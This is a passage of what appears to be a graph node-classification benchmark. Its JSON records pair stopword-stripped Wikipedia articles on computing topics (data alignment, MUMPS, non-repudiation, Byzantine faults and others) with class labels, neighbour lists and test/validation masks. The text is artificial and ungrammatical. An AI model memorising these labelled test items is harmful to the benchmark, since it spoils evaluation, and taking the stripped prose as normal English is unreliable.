    "text": "Data_structure_alignment:data structure alignment data structure alignment refers way data arranged accessed computer memory consists three separate related issues data alignment data structure padding packing cpu modern computer hardware performs reads writes memory efficiently data naturally aligned generally means data address multiple data size data alignment refers aligning elements according natural alignment ensure natural alignment may necessary insert padding structure elements last element structure although data structure alignment fundamental issue modern computers many computer languages computer language implementations handle data alignment automatically ada pl/i pascal certain c c++ implementations rust c assembly language allow least partial control data structure padding may useful certain special circumstances memory address said n-byte aligned multiple n bytes n power 2 context byte smallest unit memory access i.e memory address specifies different byte n -byte aligned address would minimum log n least-significant zeros expressed binary alternate wording b-bit aligned designates b/8 byte aligned address ex 64-bit aligned 8 bytes aligned memory access said aligned data accessed n bytes long datum address n -byte aligned memory access aligned said misaligned note definition byte memory accesses always aligned memory pointer refers primitive data n bytes long said aligned allowed contain addresses n -byte aligned otherwise said unaligned memory pointer refers data aggregate data structure array aligned primitive datum aggregate aligned note definitions assume primitive datum power two bytes long case 80-bit floating-point x86 context influences conditions datum considered aligned data structures stored memory stack static size known bounded heap dynamic size known unbounded computer accesses memory single memory word time long memory word size least large largest primitive data type supported computer aligned accesses always access single memory word may true misaligned data accesses highest lowest bytes datum within memory word computer must split datum access multiple memory accesses requires lot complex circuitry generate memory accesses coordinate handle case memory words different memory pages processor must either verify pages present executing instruction able handle tlb miss page fault memory access instruction execution processor designs deliberately avoid introducing complexity instead yield alternative behavior event misaligned memory access example implementations arm architecture prior armv6 isa require mandatory aligned memory access multi-byte load store instructions depending specific instruction issued result attempted misaligned access might round least significant bits offending address turning aligned access sometimes additional caveats throw mmu exception mmu hardware present silently yield potentially unpredictable results starting armv6 architecture support added handle unaligned access many necessarily circumstances single memory word accessed operation atomic i.e whole memory word read written devices must wait read write operation completes access may true unaligned accesses multiple memory words e.g first word might read one device words written another device second word read first device value read neither original value updated value although failures rare difficult identify although compiler interpreter normally allocates individual data items aligned boundaries data structures often members different alignment requirements maintain proper alignment translator normally inserts additional unnamed data members member properly aligned addition data structure whole may padded final unnamed member allows member array structures properly aligned padding inserted structure member followed member larger alignment requirement end structure changing ordering members structure possible change amount padding required maintain alignment example members sorted descending alignment requirements minimal amount padding required minimal amount padding required always less largest alignment structure computing maximum amount padding required complicated always less sum alignment requirements members minus twice sum alignment requirements least aligned half structure members although c c++ allow compiler reorder structure members save space languages might also possible tell c c++ compilers pack members structure certain level alignment e.g pack 2 means align data members larger byte two-byte boundary padding members one byte long one use packed structures conserve memory example structure containing single byte four-byte integer would require three additional bytes padding large array structures would use 37.5 less memory packed although accessing structure might take longer compromise may considered form space–time tradeoff although use packed structures frequently used conserve memory space may also used format data structure transmission using standard protocol however usage care must also taken ensure values struct members stored endianness required protocol often network byte order may different endianness used natively host machine following formulas provide number padding bytes required align start data structure mod modulo operator example padding add offset 0x59d 4-byte aligned structure 3 structure start 0x5a0 multiple 4 however alignment offset already equal align second modulo align offset mod align mod align return zero therefore original value left unchanged since alignment definition power two modulo operation reduced bitwise boolean operation following formulas produce aligned offset bitwise bitwise data structure members stored sequentially memory structure member data1 always precede data2 data2 always precede data3 type short stored two bytes memory member data structure depicted would 2-byte aligned data1 would offset 0 data2 offset 2 data3 offset 4 size structure would 6 bytes type member structure usually default alignment meaning unless otherwise requested programmer aligned pre-determined boundary following typical alignments valid compilers microsoft visual c++ borland/codegear c++builder digital mars dmc gnu gcc compiling 32-bit x86 notable differences alignment lp64 64-bit system compared 32-bit system data types dependent implementation structure members various types totaling 8 bytes compilation compilation data structure supplemented padding bytes ensure proper alignment members compiled size structure 12 bytes important note last member padded number bytes required total size structure multiple largest alignment structure member alignment int case 4 linux-32bit/gcc case 3 bytes added last member pad structure size 12 bytes alignment int × 3 example total size structure 5 size multiple 4 alignment float example total size structure 5 8 either size multiple 2 alignment short 2 linux-32bit/gcc possible change alignment structures reduce memory require conform existing format reordering structure members changing compiler ’ alignment “ packing ” structure members compiled size structure matches pre-compiled size 8 bytes note replaced thus eliminated longer necessary structure already aligned size long word alternative method enforcing structure aligned one byte boundary cause pre-processor discard pre-determined alignment structure members thus padding bytes would inserted standard way defining alignment structure members compilers use directives specify packing inside source files example structure would compiled size 6 bytes 32-bit system directives available compilers microsoft borland gnu many others another example microsoft compilers particularly risc processor unexpected relationship project default packing /zp directive directive directive used reduce packing size structure project default packing leads interoperability problems library headers use example project packing smaller reason setting project packing value default 8 bytes would break directives used library headers result binary incompatibilities structures limitation present compiling x86 would beneficial allocate memory aligned cache lines array partitioned one thread operate sub-array boundaries unaligned cache lines could lead performance degradation example allocate memory double array size 10 aligned cache 64 bytes alignment concerns affect areas much larger c structure purpose efficient mapping area hardware address translation mechanism pci remapping operation mmu instance 32-bit operating system 4 kib 4096 bytes page arbitrary 4 kib chunk data instead usually region memory aligned 4 kib boundary aligning page page-sized boundary lets hardware map virtual address physical address substituting higher bits address rather complex arithmetic example assume tlb mapping virtual address 0x2cfc7000 physical address 0x12345000 note addresses aligned 4 kib boundaries accessing data located virtual address va=0x2cfc7abc causes tlb resolution 0x2cfc7 0x12345 issue physical access pa=0x12345abc 20/12-bit split luckily matches hexadecimal representation split 5/3 digits hardware implement translation simply combining first 20 bits physical address 0x12345 last 12 bits virtual address 0xabc also referred virtually indexed abc physically tagged 12345 block data size 2 1 always one sub-block size 2 aligned 2 bytes dynamic allocator knowledge alignment used provide aligned buffers price factor two space loss aligntonext p r works adding aligned increment clearing r least significant bits p possible implementation",
    "neighbors": [
      1922,
      8966,
      6664,
      2327,
      6296,
      5501,
      3615,
      1952,
      799,
      10786,
      428,
      5165,
      5040,
      8502,
      11447,
      1724,
      8126,
      4543,
      10176,
      833,
      9921,
      5830,
      4424,
      5065,
      8524,
      7889,
      5844,
      7421,
      477,
      7263,
      7775,
      8545,
      8037,
      5094,
      9445,
      9964,
      10734,
      1775,
      1776,
      9714,
      499,
      2804,
      11634,
      5241,
      3323,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7072,
    "label": 3,
    "text": "Ultra_30:ultra 30 ultra 30 family sun microsystems workstations based ultrasparc ii microprocessor code-named quark member sun ultra series launched may 1997 shipped solaris 2.6 ultra 30 reached end-of-life may 1999 ultra 30 ran single ultrasparc ii cpu however compatible two models 250 mhz module 501-4857 300 mhz module 501-4849 system supports two ultra scsi hard drives 16 dimm slots maximum 2gb memory capacity machine also featured four full-sized pci slots two upa slots two rs-232c/rs-423 serial ports 100base-t fastethernet",
    "neighbors": [
      3328,
      9731,
      1801,
      4235,
      1809,
      2710,
      1316,
      10789,
      1707,
      3247,
      6322,
      7104,
      9665,
      6338,
      10436,
      1480,
      2895,
      3919,
      597,
      10200,
      4960,
      9955,
      11363,
      11626,
      7148,
      7022,
      8179,
      9333,
      1399,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 7073,
    "label": 4,
    "text": "Crypto_(book):crypto book crypto code rebels beat government saving privacy digital age book cryptography written steven levy published 2001 levy details emergence public key cryptography digital signatures struggle national security agency nsa cypherpunks book details creation data encryption standard des rsa clipper chip",
    "neighbors": [
      8283,
      4435,
      2580,
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 7074,
    "label": 1,
    "text": "Skipper_(computer_software):skipper computer software skipper visualization tool code/schema generator php orm frameworks like doctrine2 doctrine propel cakephp used create database abstraction layer skipper developed czech company inventic s.r.o based brno known orm designer prior rebranding 2014 skipper built qt framework import/export schema definitions uses xsl transformations powered libxslt library imported source files first converted xml format conversion xml simple conversion yml creating abstract syntax tree subsequent conversion xml php annotations import/export scripts configured javascript freely customized frameworks supported visual model schema files generation skipper created internal tool web applications developed inventic first published commercial tool name orm designer 2009 application reworked optimized january 2013 released orm designer 2 may 2013 orm designer became part south moravian innovation center incubator program support program innovative technological startups june 2014 orm designer version 3 released rebranded name skipper",
    "neighbors": [
      2688,
      3080,
      9481,
      1034,
      2348,
      5612,
      9614,
      7983,
      3763,
      502,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 7075,
    "label": 4,
    "text": "Non-repudiation:non-repudiation non-repudiation refers situation statement author successfully dispute authorship validity associated contract term often seen legal setting authenticity signature challenged instance authenticity repudiated example mallory buys cell phone 100 writes paper cheque check payment signs cheque pen later finds ca n't afford claims cheque forgery unfortunately signature guarantees mallory could signed cheque mallory bank must pay cheque non-repudiation mallory repudiate cheque practice pen-and-paper signatures n't hard forge digital signatures hard break general non-repudiation involves associating actions changes unique individual example secure area may use key card access system non-repudiation would violated key cards shared lost stolen cards immediately reported similarly owner computer account must allow others use giving away password policy implemented enforce prevents owner account denying actions performed account digital security non-repudiation means proof data integrity typically easiest requirements accomplish data hash sha2 usually ensures data changed undetectably even safeguard possible tamper data transit either man-in-the-middle attack phishing data integrity best asserted recipient already possesses necessary verification information common methods provide non-repudiation context digital communications storage message authentication codes mac useful communicating parties arranged use shared secret possess digital signatures powerful tool provides non-repudiation publicly verifiable manner note goal achieve confidentiality cases mac digital signature one simply appends tag otherwise plaintext visible message confidentiality also required encryption scheme combined digital signature form authenticated encryption could used verifying digital origin means certified/signed data likely came someone possesses private key corresponding signing certificate key used digitally sign message properly safeguarded original owner digital forgery occur mitigate risk people repudiating signatures standard approach involve trusted third party two common ttps forensic analysts notaries forensic analyst specializing handwriting compare signature known valid signature assess legitimacy notary witness verifies individual identity checking credentials affixing certification person signing claim notary provides extra benefit maintaining independent logs transactions complete types credentials checked another signature verified forensic analyst double security makes notaries preferred form verification digital information commonly employed ttp certificate authority issues public key certificates public key certificate used anyone verify digital signatures without shared secret signer verifier role certificate authority authoritatively state certificate belongs meaning person entity possesses corresponding private key however digital signature forensically identical legitimate forged uses someone possesses private key create valid digital signature protecting private key idea behind united states department defense common access card cac never lets key leave card means use card encryption digital signatures person needs personal identification number pin code necessary unlock",
    "neighbors": [
      517,
      11660,
      9744,
      1297,
      9884,
      10918,
      5674,
      7979,
      3629,
      4793,
      3264,
      3671,
      1496,
      9690,
      8674,
      483,
      612,
      744,
      9576,
      9336,
      5373,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 7076,
    "label": 9,
    "text": "MUMPS:mumps mumps massachusetts general hospital utility multi-programming system general-purpose computer programming language originally designed 1966 healthcare industry differentiating feature built-in database enabling high-level access disk storage using simple symbolic program variables subscripted arrays similar variables used languages access main memory continues used today many large hospitals banks provide high-throughput transaction data processing mumps developed neil pappalardo robert greenes curt marble dr. octo barnett animal lab massachusetts general hospital mgh boston 1966 1967 original mumps system like unix years later built spare dec pdp-7 octo barnett neil pappalardo also involved mgh planning hospital information system obtained backward compatible pdp-9 began using mumps admissions cycle laboratory test reporting mumps interpreted language yet even incorporated hierarchical database file system standardize interaction data aspects mumps traced rand corporation joss bbn telcomp stringcomp mumps team deliberately chose include portability machines design goal another feature widely supported machines era operating systems computer hardware multitasking also built language portability soon useful mumps shortly adapted dec pdp-15 lived time mumps developed support government research grant mumps released public domain longer requirement grants soon ported number systems including popular dec pdp-8 data general nova dec pdp-11 artronix pc12 minicomputer word mumps spread mostly medical community early 1970s widespread use often locally modified needs early 1970s many varied implementations mumps range hardware platforms widespread dec mumps-11 pdp-11 meditech miis 1972 many mumps users attended conference standardized then-fractured language created mumps users group mumps development committee mdc efforts proved successful standard complete 1974 approved september 15 1977 ansi standard x11.1-1977 time dec launched dsm-11 digital standard mumps pdp-11 quickly dominated market became reference implementation time also intersystems sold ism-11 pdp-11 identical dsm-11 early 1980s several vendors brought mumps-based platforms met ansi standard market significant companies developed important mumps implementations period also saw considerable mdc activity second revision ansi standard mumps x11.1-1984 approved november 15 1984 us department veterans affairs formerly veterans administration one earliest major adopters mumps language development work subsequent contributions free mumps application codebase influence many medical users worldwide 1995 veterans affairs patient admission/tracking/discharge system decentralized hospital computer program dhcp recipient computerworld smithsonian award best use information technology medicine july 2006 department veterans affairs va veterans health administration vha recipient innovations american government award presented ash institute john f. kennedy school government harvard university extension dhcp veterans health information systems technology architecture vista nearly entire va hospital system united states indian health service major parts department defense chcs hospital system use mumps databases clinical data tracking 2015 department defense awarded 10 year contract leidos cerner accenture replace chcs 2017 veterans health administration vha announced would replace vista cerner 2024 2025 2019 vha announced would also replace epic systems online appointment scheduling system one cerner 2024 healthcare companies using mumps include epic meditech ge healthcare formerly idx systems centricity ameripath part quest diagnostics care centric allscripts coventry healthcare emis sunquest information systems formerly misys healthcare many reference laboratories dasa quest diagnostics dynacare use mumps software written based antrim corporation code antrim purchased misys healthcare sunquest information systems 2001 mumps also widely used financial applications mumps gained early following financial sector use many banks credit unions used ameritrade largest online trading service us 12 billion transactions per day well bank england barclays bank among others since 2005 use mumps either form gt.m intersystems caché latter aggressively marketed intersystems success penetrating new markets telecommunications addition existing markets european space agency announced may 13 2010 use intersystems caché database support gaia mission mission aims map milky way unprecedented precision mumps language intended designed build database applications secondary language features included help programmers make applications using minimal computing resources original implementations interpreted though modern implementations may fully partially compiled individual programs run memory partitions early mumps memory partitions limited 2048 bytes aggressive abbreviation greatly aided multi-programming severely resource limited hardware one mumps job could fit small memories extant hardware time ability provide multi-user systems another language design feature word multi-programming acronym points even earliest machines running mumps supported multiple jobs running time change mini-computers micro-computers years later even single user pc single 8-bit cpu 16k 64k memory could support multiple users could connect non-graphical video display terminals since memory tight originally language design mumps valued terse code thus every mumps command function name could abbreviated one three letters length e.g quit exit program q p piece function r read command tr translate function spaces end-of-line markers significant mumps line scope promoted terse language design thus single line program code could express characters idea programming languages could require 5 10 times many characters abbreviation common feature languages designed period e.g. focal-69 early basics tiny basic etc. unfortunate side effect coupled early need write minimalist code mumps programmers routinely comment code used extensive abbreviations meant even expert mumps programmer could skim page code see function would analyze line line database interaction transparently built language mumps language provides hierarchical database made persistent sparse arrays implicitly opened every mumps application variable names prefixed caret character use permanent instead ram storage maintain values application exits visible modifiable running applications variables using shared permanent storage called globals mumps scoping variables globally available jobs system recent common use name global variables languages limited scoping names coming fact unscoped variables globally available programs running process shared among multiple processes mumps storage mode i.e globals stored persistent sparse arrays gives mumps database characteristics document-oriented database variable names prefixed caret character temporary private like global variables also hierarchical storage model locally available single job thus called locals globals locals child nodes called subscripts mumps terminology subscripts limited numerals—any ascii character group characters subscript identifier uncommon modern languages perl javascript highly unusual feature late 1970s capability universally implemented mumps systems 1984 ansi standard canonically numeric subscripts required standard allowed thus variable named 'car subscripts door steering wheel engine contain value subscripts variable ^car door could nested variable subscript color example thus could say modify nested child node ^car mumps terms color 2nd subscript variable ^car names child-nodes child-nodes likewise called subscripts hierarchical variables similar objects properties many object oriented languages additionally mumps language design requires subscripts variables automatically kept sorted order numeric subscripts including floating-point numbers stored lowest highest non-numeric subscripts stored alphabetical order following numbers mumps terminology canonical order using non-negative integer subscripts mumps programmer emulate arrays data type languages although mumps natively offer full set dbms features mandatory schemas several dbms systems built top provide application developers flat-file relational network database features additionally built-in operators treat delimited string e.g. comma-separated values array early mumps programmers would often store structure related information delimited string parsing read saved disk access time offered considerable speed advantages hardware mumps data types numbers treated strings digits strings treated numbers numeric operators coerced mumps terminology coercion odd side effects however example string coerced parser turns much string starting left number discards rest thus statement codice_1 evaluated codice_2 mumps features language intended help mumps applications interact multi-user environment database locks process identifiers atomicity database update transactions required standard mumps implementations contrast languages c wirth traditions space characters mumps statements significant single space separates command argument space newline separates argument next mumps token commands take arguments e.g. codice_3 require two following spaces concept one space separates command nonexistent argument next separates argument next command newlines also significant codice_4 codice_3 codice_6 command processes skips everything else till end-of-line make statements control multiple lines must use codice_7 command create code block simple hello world program mumps might would run mumps command line command codice_8 since mumps allows commands strung together line since commands abbreviated single letter routine could made compact 'codice_9 text generates newline ansi x11.1-1995 gives complete formal description language annotated version standard available online data types one universal datatype implicitly coerced string integer floating-point datatypes context requires booleans called truthvalues mumps commands syntax expressions evaluated conditions string value evaluated numeric value nonzero value interpreted true codice_10 yields 1 less b 0 otherwise declarations none variables dynamically created first time value assigned lines important syntactic entities unlike status languages patterned c pascal multiple statements per line allowed common scope else command remainder current line case sensitivity commands intrinsic functions case-insensitive contrast variable names labels case-sensitive special meaning upper vs. lower-case widely followed conventions percent sign legal first character variables labels postconditionals execution almost command controlled following colon truthvalue expression codice_11 sets foo n less 10 codice_12 performs printerr n greater 100 construct provides conditional whose scope less full line abbreviation abbreviate nearly commands native functions one two three characters reserved words none since mumps interprets source code context need reserved words may use names language commands variables following perfectly legal mumps code mumps made obfuscated using contracted operator syntax shown terse example derived example arrays created dynamically stored b-trees sparse i.e use almost space missing nodes use number subscripts subscripts strings numeric including floating point arrays always automatically stored sorted order never occasion sort pack reorder otherwise reorganize database built functions data order next deprecated query functions provide efficient examination traversal fundamental array structure disk memory local arrays variable names beginning caret i.e stored memory process private creating process expire creating process terminates available storage depends implementation implementations using partitions limited partition size small partition might 32k implementations may several megabytes global arrays codice_13 stored disk available processes persistent creating process terminates large globals example hundreds gigabytes practical efficient implementations mumps main database mechanism used instead calling operating system create write read files indirection many contexts codice_14 used effectively substitutes contents vbl another mumps statement codice_15 sets variable abc 123. codice_16 performs subroutine named report substitution allows lazy evaluation late binding well effectively operational equivalent pointers languages piece function breaks variables segmented pieces guided user specified separator string sometimes called delimiter know awk find familiar codice_17 means third caret-separated piece stringvar piece function also appear assignment set command target codice_18 yields std codice_19 causes x become office world.std.com note p equivalent piece could written order function function treats input structure finds next index exists structure except last subscript returns sorted value ordered one given input treats array reference content-addressable data rather address value codice_20 yields 6 codice_21 yields 10 codice_22 yields 10 codice_23 yields 15 codice_24 yields argument-less repeats stopped terminating quit line prints table stuff successively 6 10 15 iterating database order function returns next key use multi-user/multi-tasking/multi-processor mumps supports multiple simultaneous users processes even underlying operating system e.g. ms-dos additionally ability specify environment variable specifying machine name variable codice_25 allow access data remote machines aspects mumps syntax differ strongly modern languages cause confusion whitespace allowed within expressions ends statement codice_26 error must written codice_27 operators precedence left-associative codice_28 evaluates 50 operators less equal greater equal codice_29 codice_30 boolean negation operator codice_31 plus strict comparison operator periods codice_32 used indent lines block whitespace else command need corresponding operates inspecting value builtin system variable codice_33 mumps scoping rules permissive modern languages declared local variables scoped using stack routine normally see declared locals routines call stack routines prevent routines call modifying declared locals contrast undeclared variables variables created using rather declaration scope routines running process remain scope program exits following positions supported knowledgeable people various times contention arose response strong advocacy part one commercial interest intersystems whose chief executive disliked name mumps felt represented serious marketing obstacle thus favoring extent became identified alignment intersystems dispute also reflected rivalry organizations technology association mumps development committee ansi iso standards committees determines official name language writers attempted defuse issue referring language umps square brackets customary notation optional syntax elements leading authority author open source mumps implementation professor kevin o'kane uses 'mumps recent standard iso/iec 11756:1999 re-affirmed 25 june 2010 still mentions mumps officially accepted names massachusetts general hospital registered mumps trademark uspto november 28 1971 renewed november 16 1992 let expire august 30 2003 mumps invites comparison pick operating system similarities include",
    "neighbors": [
      8201,
      7691,
      7188,
      8732,
      9245,
      9759,
      5677,
      8751,
      5684,
      6718,
      576,
      2625,
      3650,
      1606,
      3142,
      8262,
      5711,
      7775,
      8291,
      9828,
      3705,
      7292,
      9345,
      6797,
      655,
      10387,
      6809,
      7326,
      4777,
      8876,
      10413,
      6837,
      6335,
      5833,
      8910,
      7889,
      1253,
      10470,
      10471,
      10475,
      10991,
      240,
      6395,
      263,
      1804,
      10510,
      11024,
      273,
      5395,
      3876,
      2345,
      5929,
      7983,
      6448,
      823,
      8503,
      11075,
      8524,
      9557,
      10590,
      6502,
      8554,
      5492,
      6008,
      3960,
      3462,
      8582,
      6536,
      6027,
      5521,
      1435,
      1952,
      11683,
      6074,
      8644,
      2507,
      974,
      11219,
      2519,
      477,
      10720,
      4069,
      5612,
      9714,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7077,
    "label": 3,
    "text": "Allwinner_A1X:allwinner a1x allwinner a1x family single-core soc devices designed allwinner technology zhuhai china currently family consists a10 a13 a10s a12 socs incorporate arm cortex-a8 main processor mali 400 gpu allwinner a1x known ability boot linux distributions debian ubuntu fedora arm architecture-capable distributions sd card addition android os usually installed flash memory device video acceleration display controller memory connectivity storage boot devices many manufacturers adopted allwinner a1x use devices running android operating system linux operating system allwinner a1x used tablet computers set-top boxes pc-on-a-stick mini-pcs single-board computers allwinner a1x architecture referred 'sunxi linux kernel source tree source code available github moment stable full hardware support limited 3.0.x 3.4.x kernels recent mainline versions kernel run offer nand access limited 3d-acceleration work progress support efika freebsd moment on-board peripherals working may 2015 openbsd armv7 port supports cubieboard pcduino boards based allwinner a1x netbsd contains support allwinner a10 factory sourced programmers manual publicly available a10s cpu moment apart single-core a1x a10/a13/a10s/a12 two new powerful cortex-a7 allwinner socs released allwinner a10-pin-compatible dual-core allwinner a20 quad-core allwinner a31",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      10361,
      638,
      644,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      2838,
      5417,
      2862,
      7988,
      11062,
      823,
      1849,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      4508,
      5028,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      11221,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 7078,
    "label": 5,
    "text": "Domain_Technologie_Control:domain technologie control domain technologie control dtc web hosting control panel aimed providing graphics-oriented layout managing commercial hosting web servers intended shared web hosting servers virtual private servers vpses dedicated servers domain technologie control free software released gnu lgpl v2.1 license fully skinnable translated several languages domain technologie control allows administrator create web hosting plans provide e-mail ftp accounts domain purchasing subdomains ssh mysql databases end users controllable quota web sites users dtc also maintains automation billing generates backup scripts monitors traffic per user per service using single system uid gid also integrated dtc support ticket system customizable http error pages dtc manages mysql database store setup configuration web hosting plans users support many free software mysql apache php qmail postfix courier dovecot proftpd webalizer mod-log-sql also connects dtc-xen manage monitor usage virtual private servers vps dtc fully open source lgpl dtc also first web hosting control panel reached inclusion major distributions like debian since lenny 2009 ubuntu since 2008 freebsd",
    "neighbors": [
      225,
      1410,
      865,
      7364,
      8644,
      8865,
      10341,
      2504,
      7022,
      7983,
      1650,
      119,
      8310,
      823,
      11097,
      10814
    ],
    "mask": "Test"
  },
  {
    "node_id": 7079,
    "label": 3,
    "text": "Star_Soldier_(video_game):star soldier video game mobile versions released january 26 2001 japan star soldier special+ 2004 star soldier sp arcade 2005 2008 're also released palm os november 2001 japan ios january 4 2012 united states star soldier spawned numerous sequels starting super star soldier pc engine ported game boy advance 2004 japan part famicom mini series wii virtual console japanese north american regions july 2007 enhanced remake game released playstation portable japan 2005 3ds virtual console re-released konami november 14 2012 japan august 15 2013 pal version september 24 2013 north america ios version titled june 20 2013 japan",
    "neighbors": [
      4216,
      9006,
      599
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7080,
    "label": 1,
    "text": "Referential_integrity:referential integrity referential integrity property data stating references valid context relational databases requires value one attribute column relation table references value another attribute either different relation referenced value must exist referential integrity hold relational database column base table declared foreign key contain either null values values parent table primary key candidate key words foreign key value used must reference valid existing primary key parent table instance deleting record contains value referred foreign key another table would break referential integrity relational database management systems rdbms enforce referential integrity normally either deleting foreign key rows well maintain integrity returning error performing delete method used may determined referential integrity constraint defined data dictionary adjective 'referential describes action foreign key performs 'referring linked column another table simple terms 'referential integrity guarantees target 'referred found lack referential integrity database lead relational databases return incomplete data usually indication error inclusion dependency two possibly identical predicates formula_1 formula_2 schema written formula_3 formula_4 formula_5 distinct attributes column names formula_1 formula_2 implies tuples values appearing columns formula_8 facts formula_1 must also appear tuple values columns formula_10 fact formula_2 logical implication inclusion dependencies axiomatized inference rules decided pspace algorithm problem shown pspace-complete reduction acceptance problem linear bounded automaton however logical implication dependencies inclusion dependencies functional dependencies undecidable reduction word problem monoids declarative referential integrity dri one techniques sql database programming language ensure data integrity table called referencing table refer column group columns another table referenced table using foreign key referenced column referenced table must unique constraint primary key also self-references possible fully implemented ms sql server though inserting new row referencing table relational database management system rdbms checks entered key value exists referenced table insert possible also possible specify dri actions update delete cascade forwards change/delete referenced table referencing tables action specific row referenced changing key allowed set null set default changed/deleted key referenced table results setting referencing values null default value one specified ansi/iso/iec 9075-1:2003 information technology—database languages—sql—part 1 framework sql/framework ansi/iso/iec 9075-2:2003 information technology—database languages—sql—part 2 foundation sql/foundation microsoft sql server term dri also applies assigning permissions users database object giving dri permission database user allows add foreign key constraints table",
    "neighbors": [
      3591,
      8201,
      2068,
      1049,
      5658,
      9248,
      10793,
      10286,
      11324,
      9286,
      2632,
      9290,
      8788,
      10326,
      4183,
      7767,
      8291,
      9828,
      10340,
      8808,
      2669,
      1146,
      3196,
      6782,
      9360,
      10389,
      4255,
      5792,
      4263,
      10413,
      6831,
      9397,
      7868,
      6850,
      2246,
      2780,
      734,
      736,
      10471,
      6383,
      7412,
      5373,
      8979,
      7446,
      11030,
      5401,
      5403,
      287,
      2344,
      1341,
      10048,
      2369,
      5953,
      7506,
      2901,
      10069,
      347,
      8539,
      7523,
      9075,
      10628,
      10632,
      2456,
      9112,
      10137,
      9631,
      1954,
      9634,
      1447,
      3004,
      2512,
      2009,
      987,
      4065,
      2024,
      6124,
      2544,
      10737
    ],
    "mask": "Test"
  },
  {
    "node_id": 7081,
    "label": 4,
    "text": "TotalRecovery:totalrecovery totalrecovery backup recovery software product developed farstone technology formerly known driveclone totalrecovery written c++ runs microsoft windows 32-bit 64-bit utility utilizes windows preinstallation environment allows users administer tasks loading operating system totalrecovery comes two editions express edition professional edition express edition requires installation fewer features compared professional edition",
    "neighbors": [
      9025,
      6797,
      1358,
      7983,
      9910
    ],
    "mask": "None"
  },
  {
    "node_id": 7082,
    "label": 2,
    "text": "Floppyfw:floppyfw floppyfw linux distribution running busybox provide firewall/gateway/router single bootable floppy disk later available cd format reviews concluded simple reliable gateway/firewall could established small medium-sized networks low cost ease.. one independent study concluded best possible security provided floppy-based firewall repurposing old redundant hardware linux-based firewalls routers floppyfw features include",
    "neighbors": [
      4611,
      516,
      8837,
      2825,
      7435,
      10127,
      2321,
      1814,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      8998,
      10149,
      11305,
      7854,
      2738,
      4790,
      439,
      56,
      59,
      3903,
      9279,
      4673,
      10433,
      2375,
      4039,
      5959,
      5322,
      8907,
      11086,
      10451,
      1110,
      9048,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      499,
      5363,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 7083,
    "label": 2,
    "text": "Internal_field_separator:internal field separator many command line interpreters “ shell ” unix operating systems internal field separator abbreviated ifs refers variable defines character characters used separate pattern tokens operations ifs typically includes space tab newline bash man page shell treats character ifs delimiter splits results expansions words characters ifs unset value exactly space tab newline default sequences space tab newline beginning end results previous expansions ignored sequence ifs characters beginning end serves delimit words ifs value default sequences whitespace characters space tab ignored beginning end word long whitespace character value ifs ifs whitespace character character ifs ifs whitespace along adjacent ifs whitespace characters delimits field sequence ifs whitespace characters also treated delimiter value ifs null word splitting occurs ifs usable exploit versions unix program root permissions could fooled executing user-supplied code ran instance codice_1 called ifs set case would run program bin current directory thus writable user root permissions fixed making shells inherit ifs variable examples apply use ifs bash scripts",
    "neighbors": [
      5492,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 7084,
    "label": 4,
    "text": "National_Cyber_Security_Awareness_Month:national cyber security awareness month national cyber security awareness month ncsam observed october united states america started national cyber security division within department homeland security nonprofit national cyber security alliance month raises awareness importance cybersecurity 2004 department homeland security national cyber security alliance launched national cyber security awareness month broad effort help americans stay safe secure online initial efforts included advice like keeping antivirus programs date since 2009 month included overall theme shared responsibility weekly themes throughout month introduced 2011",
    "neighbors": [
      8752,
      7156,
      3741
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7085,
    "label": 3,
    "text": "Byzantine_fault:byzantine fault byzantine fault also interactive consistency source congruency error avalanche byzantine agreement problem byzantine generals problem byzantine failure condition computer system particularly distributed computing systems components may fail imperfect information whether component failed term takes name allegory byzantine generals problem developed describe condition actors must agree concerted strategy avoid catastrophic system failure actors unreliable byzantine fault component server inconsistently appear failed functioning failure-detection systems presenting different symptoms different observers difficult components declare failed shut network need first reach consensus regarding component failed first place byzantine fault tolerance bft dependability fault-tolerant computer system conditions byzantine fault fault presenting different symptoms different observers byzantine failure loss system service due byzantine fault systems require consensus objective byzantine fault tolerance able defend failures system components without symptoms prevent components system reaching agreement among agreement needed correct operation system remaining correctly operational components byzantine fault tolerant system able continue providing system service originally intended assuming sufficiently many accurately operating components maintain service byzantine failures considered general difficult class failures among failure modes so-called fail-stop failure mode occupies simplest end spectrum whereas fail-stop failure mode simply means way fail node crash detected nodes byzantine failures imply restrictions means failed node generate arbitrary data pretending correct one thus byzantine failures confuse failure detection systems makes fault tolerance difficult despite analogy byzantine failure necessarily security problem involving hostile human interference arise purely electrical faults terms fault failure used according standard definitions originally created joint committee fundamental concepts terminology formed ieee computer society technical committee dependable computing fault-tolerance ifip working group 10.4 dependable computing fault tolerance version definitions also described dependability wikipedia page problem obtaining byzantine consensus conceived formalized robert shostak dubbed interactive consistency problem work done 1978 context nasa-sponsored sift project computer science lab sri international sift software implemented fault tolerance brain child john wensley based idea using multiple general-purpose computers would communicate pairwise messaging order reach consensus even computers faulty beginning project clear many computers total needed guarantee conspiracy n faulty computers could thwart efforts correctly-operating ones reach consensus shostak showed minimum 3 n+ 1 needed devised two-round 3 n+1 messaging protocol would work n =1 colleague marshall pease generalized algorithm n 0 